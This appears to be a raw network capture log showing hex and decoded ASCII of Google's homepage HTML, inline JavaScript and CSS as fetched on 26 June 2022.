                                                  2022-06-26 07:48:21 UTC1INData Raw: 35 36 37 38 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 69 74 65 6d 73 63 6f 70 65 3d 22 22 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 57 65 62 50 61 67 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 47 42 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 3c 6d 65 74 61 20 63 6f 6e 74
                                                  Data Ascii: 5678<!doctype html><html itemscope="" itemtype="http://schema.org/WebPage" lang="en-GB"><head><meta content="text/html; charset=UTF-8" http-equiv="Content-Type"><meta cont
                                                  2022-06-26 07:48:21 UTC1INData Raw: 65 6e 74 3d 22 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 67 2f 31 78 2f 67 6f 6f 67 6c 65 67 5f 73 74 61 6e 64 61 72 64 5f 63 6f 6c 6f 72 5f 31 32 38 64 70 2e 70 6e 67 22 20 69 74 65 6d 70 72 6f 70 3d 22 69 6d 61 67 65 22 3e 3c 74 69 74 6c 65 3e 47 6f 6f 67 6c 65 3c 2f 74 69 74 6c 65 3e 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 6d 63 55 74 69 34 46 30 6e 31 4c 53 35 44 72 76 4a 70 76 4d 42 51 22 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 67 6f 6f 67 6c 65 3d 7b 6b 45 49 3a 27 52 51 2d 34 59 73 53 66 44 72 4b 41 69 2d 67 50 31 66 43 73 6f 41 59 27 2c 6b 45 58 50 49 3a 27 30 2c 31 33 30 32 35 33 36 2c 35 34 32 34 34 2c 32 36 32 39 2c 36 30 35 38 2c 32 30 37 2c 34 38 30 34 2c 32 33 31 36 2c 33 38 33 2c 32 34 36
                                                  Data Ascii: ent="/images/branding/googleg/1x/googleg_standard_color_128dp.png" itemprop="image"><title>Google</title><script nonce="mcUti4F0n1LS5DrvJpvMBQ">(function(){window.google={kEI:'RQ-4YsSfDrKAi-gP1fCsoAY',kEXPI:'0,1302536,54244,2629,6058,207,4804,2316,383,246
                                                  2022-06-26 07:48:21 UTC2INData Raw: 30 2c 32 31 33 30 2c 34 32 37 2c 38 34 39 2c 37 31 39 2c 33 36 35 38 2c 39 33 32 35 31 39 27 2c 6b 42 4c 3a 27 30 4d 75 38 27 7d 3b 67 6f 6f 67 6c 65 2e 73 6e 3d 27 77 65 62 68 70 27 3b 67 6f 6f 67 6c 65 2e 6b 48 4c 3d 27 65 6e 2d 47 42 27 3b 7d 29 28 29 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 0a 76 61 72 20 66 3d 74 68 69 73 7c 7c 73 65 6c 66 3b 76 61 72 20 68 2c 6b 3d 5b 5d 3b 66 75 6e 63 74 69 6f 6e 20 6c 28 61 29 7b 66 6f 72 28 76 61 72 20 62 3b 61 26 26 28 21 61 2e 67 65 74 41 74 74 72 69 62 75 74 65 7c 7c 21 28 62 3d 61 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 65 69 64 22 29 29 29 3b 29 61 3d 61 2e 70 61 72 65 6e 74 4e 6f 64 65 3b 72 65 74 75 72 6e 20 62 7c 7c 68 7d 66 75 6e 63 74 69 6f 6e 20 6d 28 61 29 7b 66 6f 72 28 76 61 72 20 62 3d 6e 75 6c
                                                  Data Ascii: 0,2130,427,849,719,3658,932519',kBL:'0Mu8'};google.sn='webhp';google.kHL='en-GB';})();(function(){var f=this||self;var h,k=[];function l(a){for(var b;a&&(!a.getAttribute||!(b=a.getAttribute("eid")));)a=a.parentNode;return b||h}function m(a){for(var b=nul
                                                  2022-06-26 07:48:21 UTC3INData Raw: 5d 2c 62 2c 63 5d 29 7d 3b 67 6f 6f 67 6c 65 2e 6c 6f 61 64 41 6c 6c 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 67 6f 6f 67 6c 65 2e 6c 71 2e 70 75 73 68 28 5b 61 2c 62 5d 29 7d 3b 67 6f 6f 67 6c 65 2e 62 78 3d 21 31 3b 67 6f 6f 67 6c 65 2e 6c 78 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 3b 7d 29 2e 63 61 6c 6c 28 74 68 69 73 29 3b 67 6f 6f 67 6c 65 2e 66 3d 7b 7d 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 0a 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 73 75 62 6d 69 74 22 2c 66 75 6e 63 74 69 6f 6e 28 62 29 7b 76 61 72 20 61 3b 69 66 28 61 3d 62 2e 74 61 72 67 65 74 29 7b 76 61 72 20 63 3d 61 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 73 75 62 6d 69 74 66 61
                                                  Data Ascii: ],b,c])};google.loadAll=function(a,b){google.lq.push([a,b])};google.bx=!1;google.lx=function(){};}).call(this);google.f={};(function(){document.documentElement.addEventListener("submit",function(b){var a;if(a=b.target){var c=a.getAttribute("data-submitfa
                                                  2022-06-26 07:48:21 UTC5INData Raw: 6c 75 74 65 3b 74 6f 70 3a 33 30 70 78 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 67 62 74 63 62 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 76 69 73 69 62 69 6c 69 74 79 3a 68 69 64 64 65 6e 7d 23 67 62 7a 20 2e 67 62 74 63 62 7b 72 69 67 68 74 3a 30 7d 23 67 62 67 20 2e 67 62 74 63 62 7b 6c 65 66 74 3a 30 7d 2e 67 62 78 78 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 67 62 78 6f 7b 6f 70 61 63 69 74 79 3a 30 20 21 69 6d 70 6f 72 74 61 6e 74 3b 66 69 6c 74 65 72 3a 61 6c 70 68 61 28 6f 70 61 63 69 74 79 3d 30 29 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 67 62 6d 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 7a 2d 69 6e 64 65 78 3a 39 39 39 3b 74 6f 70 3a 2d 39 39 39 70 78 3b 76 69 73 69 62 69 6c 69 74 79
                                                  Data Ascii: lute;top:30px;width:100%}.gbtcb{position:absolute;visibility:hidden}#gbz .gbtcb{right:0}#gbg .gbtcb{left:0}.gbxx{display:none !important}.gbxo{opacity:0 !important;filter:alpha(opacity=0) !important}.gbm{position:absolute;z-index:999;top:-999px;visibility
                                                  2022-06-26 07:48:21 UTC6INData Raw: 73 74 2d 73 74 79 6c 65 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 2e 67 62 6d 63 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 20 30 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7a 2d 69 6e 64 65 78 3a 32 3b 7a 6f 6f 6d 3a 31 7d 2e 67 62 74 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 64 69 73 70 6c 61 79 3a 2d 6d 6f 7a 2d 69 6e 6c 69 6e 65 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 37 70 78 3b 70 61 64 64 69 6e 67 3a 30 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 74 6f 70 7d 2e 67 62 74 7b 2a 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 7d 2e 67 62 74 6f 7b 62 6f 78 2d 73 68 61 64 6f
                                                  Data Ascii: st-style:none;margin:0;padding:0}.gbmc{background:#fff;padding:10px 0;position:relative;z-index:2;zoom:1}.gbt{position:relative;display:-moz-inline-box;display:inline-block;line-height:27px;padding:0;vertical-align:top}.gbt{*display:inline}.gbto{box-shado
                                                  2022-06-26 07:48:21 UTC7INData Raw: 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 63 34 63 34 63 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 6e 6f 6e 65 3b 5f 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 6e 6f 6e 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 30 20 2d 31 30 32 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 72 65 70 65 61 74 2d 78 3b 6f 75 74 6c 69 6e 65 3a 6e 6f 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 67 62 70 64 6a 73 20 2e 67 62 74 6f 20 2e 67 62 6d 7b 6d 69 6e 2d 77 69 64 74 68 3a 39 39 25 7d 2e 67 62 7a 30 6c 20 2e 67 62 74 62 32 7b 62 6f 72 64 65 72 2d 74 6f 70 2d 63 6f 6c 6f 72 3a 23 64 64 34 62 33 39 21 69 6d 70 6f 72 74 61 6e 74 7d 23 67 62 69 34
                                                  Data Ascii: kground-color:#4c4c4c;background-image:none;_background-image:none;background-position:0 -102px;background-repeat:repeat-x;outline:none;text-decoration:none !important}.gbpdjs .gbto .gbm{min-width:99%}.gbz0l .gbtb2{border-top-color:#dd4b39!important}#gbi4
                                                  2022-06-26 07:48:21 UTC8INData Raw: 67 62 6d 74 3a 76 69 73 69 74 65 64 2c 2e 67 62 6e 64 20 2e 67 62 6d 74 2c 2e 67 62 6e 64 20 2e 67 62 6d 74 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 64 64 38 65 32 37 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 67 62 66 20 2e 67 62 6d 74 2c 2e 67 62 66 20 2e 67 62 6d 74 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 39 30 30 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 67 62 6d 74 2c 2e 67 62 6d 6c 31 2c 2e 67 62 6d 6c 62 2c 2e 67 62 6d 74 3a 76 69 73 69 74 65 64 2c 2e 67 62 6d 6c 31 3a 76 69 73 69 74 65 64 2c 2e 67 62 6d 6c 62 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 33 36 63 20 21 69 6d 70 6f 72 74 61 6e 74 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 67 62 6d 74 2c 2e 67 62 6d 74 3a 76 69 73
                                                  Data Ascii: gbmt:visited,.gbnd .gbmt,.gbnd .gbmt:visited{color:#dd8e27 !important}.gbf .gbmt,.gbf .gbmt:visited{color:#900 !important}.gbmt,.gbml1,.gbmlb,.gbmt:visited,.gbml1:visited,.gbmlb:visited{color:#36c !important;text-decoration:none !important}.gbmt,.gbmt:vis
                                                  2022-06-26 07:48:21 UTC10INData Raw: 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 32 70 78 20 34 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 31 32 29 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7a 2d 69 6e 64 65 78 3a 31 7d 23 67 62 64 34 20 2e 67 62 6d 68 7b 6d 61 72 67 69 6e 3a 30 7d 2e 67 62 6d 74 63 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 37 70 78 7d 2e 47 42 4d 43 43 3a 6c 61 73 74 2d 63 68 69 6c 64 3a 61 66 74 65 72 2c 23 47 42 4d 50 41 4c 3a 6c 61 73 74 2d 63 68 69 6c 64 3a 61 66 74 65 72 7b 63 6f 6e 74 65 6e 74 3a 27 5c 30 41 5c 30 41 27 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 70 72 65 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 7d 23 67 62 6d 70 73 7b 2a 7a 6f 6f 6d 3a 31 7d 23 67 62 64 34 20 2e 67 62 70 63
                                                  Data Ascii: box-shadow:0 2px 4px rgba(0,0,0,.12);position:relative;z-index:1}#gbd4 .gbmh{margin:0}.gbmtc{padding:0;margin:0;line-height:27px}.GBMCC:last-child:after,#GBMPAL:last-child:after{content:'\0A\0A';white-space:pre;position:absolute}#gbmps{*zoom:1}#gbd4 .gbpc
                                                  2022-06-26 07:48:21 UTC11INData Raw: 31 30 70 78 20 32 30 70 78 20 30 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 7d 2e 67 62 6d 70 61 6c 61 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 30 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 67 62 6d 70 61 6c 62 7b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 72 69 67 68 74 7d 23 67 62 6d 70 61 73 62 20 2e 67 62 70 73 7b 63 6f 6c 6f 72 3a 23 30 30 30 7d 23 67 62 6d 70 61 6c 20 2e 67 62 71 66 62 62 7b 6d 61 72 67 69 6e 3a 30 20 32 30 70 78 7d 2e 67 62 70 30 20 2e 67 62 70 73 7b 2a 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 7d 61 2e 67 62 69 62 61 7b 6d 61 72 67 69 6e 3a 38 70 78 20 32 30 70 78 20 31 30 70 78 7d 2e 67 62 6d 70 69 61 77 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b
                                                  Data Ascii: 10px 20px 0;white-space:nowrap}.gbmpala{padding-left:0;text-align:left}.gbmpalb{padding-right:0;text-align:right}#gbmpasb .gbps{color:#000}#gbmpal .gbqfbb{margin:0 20px}.gbp0 .gbps{*display:inline}a.gbiba{margin:8px 20px 10px}.gbmpiaw{display:inline-block
                                                  2022-06-26 07:48:21 UTC12INData Raw: 30 2c 30 2c 30 2c 2e 31 29 7d 2e 67 62 71 66 62 2d 6e 6f 2d 66 6f 63 75 73 3a 66 6f 63 75 73 7b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 33 30 37 39 65 64 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 7d 2e 67 62 71 66 62 2d 68 76 72 2c 2e 67 62 71 66 62 61 2d 68 76 72 2c 2e 67 62 71 66 62 62 2d 68 76 72 7b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 31 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 31 29 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 31 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 31 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 31 70 78 20
                                                  Data Ascii: 0,0,0,.1)}.gbqfb-no-focus:focus{border:1px solid #3079ed;-moz-box-shadow:none;-webkit-box-shadow:none;box-shadow:none}.gbqfb-hvr,.gbqfba-hvr,.gbqfbb-hvr{-webkit-box-shadow:0 1px 1px rgba(0,0,0,.1);-moz-box-shadow:0 1px 1px rgba(0,0,0,.1);box-shadow:0 1px
                                                  2022-06-26 07:48:21 UTC14INData Raw: 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 2d 6d 6f 7a 2d 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 74 6f 70 2c 23 34 64 39 30 66 65 2c 23 33 35 37 61 65 38 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 2d 6d 73 2d 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 74 6f 70 2c 23 34 64 39 30 66 65 2c 23 33 35 37 61 65 38 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 2d 6f 2d 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 74 6f 70 2c 23 34 64 39 30 66 65 2c 23 33 35 37 61 65 38 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 74 6f 70 2c 23 34 64 39 30 66 65 2c 23 33 35 37 61 65 38 29 7d 2e 67 62 71 66 62 3a 61 63 74 69 76 65 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63
                                                  Data Ascii: ;background-image:-moz-linear-gradient(top,#4d90fe,#357ae8);background-image:-ms-linear-gradient(top,#4d90fe,#357ae8);background-image:-o-linear-gradient(top,#4d90fe,#357ae8);background-image:linear-gradient(top,#4d90fe,#357ae8)}.gbqfb:active{background-c
                                                  2022-06-26 07:48:21 UTC15INData Raw: 31 66 31 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 74 6f 70 2c 23 66 38 66 38 66 38 2c 23 66 31 66 31 66 31 29 3b 66 69 6c 74 65 72 3a 70 72 6f 67 69 64 3a 44 58 49 6d 61 67 65 54 72 61 6e 73 66 6f 72 6d 2e 4d 69 63 72 6f 73 6f 66 74 2e 67 72 61 64 69 65 6e 74 28 73 74 61 72 74 43 6f 6c 6f 72 53 74 72 3d 27 23 66 38 66 38 66 38 27 2c 45 6e 64 43 6f 6c 6f 72 53 74 72 3d 27 23 66 31 66 31 66 31 27 29 7d 2e 67 62 71 66 62 62 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 2d 77 65 62 6b 69 74 2d 67 72 61 64 69 65 6e 74 28 6c 69 6e 65 61 72 2c 6c 65 66 74 20 74 6f 70 2c 6c 65 66 74 20 62 6f 74 74 6f 6d 2c 66 72 6f 6d 28 23 66
                                                  Data Ascii: 1f1);background-image:linear-gradient(top,#f8f8f8,#f1f1f1);filter:progid:DXImageTransform.Microsoft.gradient(startColorStr='#f8f8f8',EndColorStr='#f1f1f1')}.gbqfbb{background-color:#fff;background-image:-webkit-gradient(linear,left top,left bottom,from(#f
                                                  2022-06-26 07:48:21 UTC16INData Raw: 31 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 31 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 31 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 31 29 3b 63 6f 6c 6f 72 3a 23 32 32 32 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 67 62 71 66 62 61 3a 61 63 74 69 76 65 2c 2e 67 62 71 66 62 62 3a 61 63 74 69 76 65 7b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 69 6e 73 65 74 20 30 20 31 70 78 20 32 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 31 29 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 69 6e 73 65 74 20 30 20 31 70 78 20 32 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 31 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 69 6e 73 65 74 20 30 20 31 70 78 20 32 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 31 29 7d 0a 23 67 62 6d 70 61 73 7b
                                                  Data Ascii: 1px rgba(0,0,0,.1);box-shadow:0 1px 1px rgba(0,0,0,.1);color:#222 !important}.gbqfba:active,.gbqfbb:active{-webkit-box-shadow:inset 0 1px 2px rgba(0,0,0,.1);-moz-box-shadow:inset 0 1px 2px rgba(0,0,0,.1);box-shadow:inset 0 1px 2px rgba(0,0,0,.1)}#gbmpas{
                                                  2022-06-26 07:48:21 UTC17INData Raw: 29 3b 74 6f 70 3a 30 7d 2e 67 62 73 62 20 2e 67 62 73 62 62 7b 2d 77 65 62 6b 69 74 2d 6d 61 73 6b 2d 62 6f 78 2d 69 6d 61 67 65 3a 2d 77 65 62 6b 69 74 2d 67 72 61 64 69 65 6e 74 28 6c 69 6e 65 61 72 2c 6c 65 66 74 20 74 6f 70 2c 72 69 67 68 74 20 74 6f 70 2c 63 6f 6c 6f 72 2d 73 74 6f 70 28 30 2c 72 67 62 61 28 30 2c 30 2c 30 2c 2e 31 29 29 2c 63 6f 6c 6f 72 2d 73 74 6f 70 28 2e 35 2c 72 67 62 61 28 30 2c 30 2c 30 2c 2e 38 29 29 2c 63 6f 6c 6f 72 2d 73 74 6f 70 28 31 2c 72 67 62 61 28 30 2c 30 2c 30 2c 2e 31 29 29 29 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 2d 77 65 62 6b 69 74 2d 67 72 61 64 69 65 6e 74 28 6c 69 6e 65 61 72 2c 6c 65 66 74 20 62 6f 74 74 6f 6d 2c 6c 65 66 74 20 74 6f 70 2c 66 72 6f 6d 28 72 67 62 61 28 30 2c 30 2c 30 2c 2e 32 29 29 2c 74 6f
                                                  Data Ascii: );top:0}.gbsb .gbsbb{-webkit-mask-box-image:-webkit-gradient(linear,left top,right top,color-stop(0,rgba(0,0,0,.1)),color-stop(.5,rgba(0,0,0,.8)),color-stop(1,rgba(0,0,0,.1)));background:-webkit-gradient(linear,left bottom,left top,from(rgba(0,0,0,.2)),to
                                                  2022-06-26 07:48:21 UTC19INData Raw: 65 7d 2e 66 6c 20 61 7b 63 6f 6c 6f 72 3a 23 31 35 35 38 64 36 7d 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 34 62 31 31 61 38 7d 2e 73 62 6c 63 7b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 35 70 78 7d 2e 73 62 6c 63 20 61 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 3a 32 70 78 20 30 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 31 33 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 31 70 78 7d 2e 6c 73 62 62 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 38 66 39 66 61 3b 62 6f 72 64 65 72 3a 73 6f 6c 69 64 20 31 70 78 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 64 61 64 63 65 30 20 23 37 30 37 35 37 61 20 23 37 30 37 35 37 61 20 23 64 61 64 63 65 30 3b 68 65 69 67 68 74 3a 33 30 70 78 7d 2e 6c 73 62 62 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 23
                                                  Data Ascii: e}.fl a{color:#1558d6}a:visited{color:#4b11a8}.sblc{padding-top:5px}.sblc a{display:block;margin:2px 0;margin-left:13px;font-size:11px}.lsbb{background:#f8f9fa;border:solid 1px;border-color:#dadce0 #70757a #70757a #dadce0;height:30px}.lsbb{display:block}#
                                                  2022-06-26 07:48:21 UTC20INData Raw: 72 65 66 26 26 28 65 3d 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2e 6f 75 74 65 72 48 54 4d 4c 2e 73 70 6c 69 74 28 22 5c 6e 22 29 5b 65 5d 2c 62 2b 3d 22 26 63 61 64 3d 22 2b 63 28 65 3f 65 2e 73 75 62 73 74 72 69 6e 67 28 30 2c 33 30 30 29 3a 22 4e 6f 20 73 63 72 69 70 74 20 66 6f 75 6e 64 2e 22 29 29 29 3b 66 6f 72 28 76 61 72 20 74 20 69 6e 20 64 29 62 2b 3d 22 26 22 2c 62 2b 3d 63 28 74 29 2c 62 2b 3d 22 3d 22 2c 62 2b 3d 63 28 64 5b 74 5d 29 3b 62 3d 62 2b 22 26 65 6d 73 67 3d 22 2b 63 28 61 2e 6e 61 6d 65 2b 22 3a 20 22 2b 61 2e 6d 65 73 73 61 67 65 29 3b 62 3d 62 2b 22 26 6a 73 73 74 3d 22 2b 63 28 61 2e 73 74 61 63 6b 7c 7c 22 4e 2f 41 22 29 3b 31 32 32 38 38 3c 3d 62 2e 6c 65 6e 67 74 68 26 26 28 62 3d 62 2e 73 75
                                                  Data Ascii: ref&&(e=document.documentElement.outerHTML.split("\n")[e],b+="&cad="+c(e?e.substring(0,300):"No script found.")));for(var t in d)b+="&",b+=c(t),b+="=",b+=c(d[t]);b=b+"&emsg="+c(a.name+": "+a.message);b=b+"&jsst="+c(a.stack||"N/A");12288<=b.length&&(b=b.su
                                                  2022-06-26 07:48:21 UTC21INData Raw: 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 3b 72 65 74 75 72 6e 20 76 6f 69 64 20 30 3d 3d 6b 3f 6d 3a 76 6f 69 64 20 30 3d 3d 6d 3f 6b 3a 6d 26 26 6b 7d 7d 7d 76 61 72 20 64 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 67 2e 62 76 2e 6d 3d 3d 61 7d 7d 2c 65 61 3d 64 61 28 31 29 2c 66 61 3d 64 61 28 32 29 3b 70 28 22 73 62 22 2c 65 61 29 3b 70 28 22 6b 6e 22 2c 66 61 29 3b 68 2e 61 3d 5f 74 76 76 3b 68 2e 62 3d 5f 74 76 66 3b 68 2e 63 3d 5f 74 76 6e 3b 68 2e 69 3d 61 61 3b 76 61 72 20 72 3d 77 69 6e 64 6f 77 2e 67 62 61 72 2e 69 2e 69 3b 76 61 72 20 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 2c 68 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 2c 6b 61 3d 66 75 6e 63 74 69 6f 6e 28
                                                  Data Ascii: y(this,arguments);return void 0==k?m:void 0==m?k:m&&k}}}var da=function(a){return function(){return g.bv.m==a}},ea=da(1),fa=da(2);p("sb",ea);p("kn",fa);h.a=_tvv;h.b=_tvf;h.c=_tvn;h.i=aa;var r=window.gbar.i.i;var t=function(){},ha=function(){},ka=function(
                                                  2022-06-26 07:48:21 UTC22INData Raw: 36 38 66 31 0d 0a 26 43 26 26 43 28 63 5b 31 5d 2e 6c 69 62 73 29 29 7d 2c 74 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 41 28 22 67 63 22 2c 61 29 7d 2c 75 61 3d 6e 75 6c 6c 2c 76 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 75 61 3d 61 7d 2c 73 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 69 66 28 75 61 29 7b 61 3d 7b 74 3a 61 2c 62 3a 62 7d 3b 69 66 28 63 29 66 6f 72 28 76 61 72 20 64 20 69 6e 20 63 29 61 5b 64 5d 3d 63 5b 64 5d 3b 74 72 79 7b 75 61 28 61 29 7d 63 61 74 63 68 28 66 29 7b 7d 7d 7d 3b 70 28 22 6d 64 63 22 2c 76 29 3b 70 28 22 6d 64 69 22 2c 6c 61 29 3b 70 28 22 62 6e 63 22 2c 77 29 3b 70 28 22 71 47 43 22 2c 74 61 29 3b 70 28 22 71 6d 22 2c 42 29 3b 70 28 22 71 64 22 2c 78 29 3b 70 28 22 6c 62 22 2c 44 29 3b 70 28 22 6d 63 66 22 2c
                                                  Data Ascii: 68f1&C&&C(c[1].libs))},ta=function(a){A("gc",a)},ua=null,va=function(a){ua=a},sa=function(a,b,c){if(ua){a={t:a,b:b};if(c)for(var d in c)a[d]=c[d];try{ua(a)}catch(f){}}};p("mdc",v);p("mdi",la);p("bnc",w);p("qGC",ta);p("qm",B);p("qd",x);p("lb",D);p("mcf",
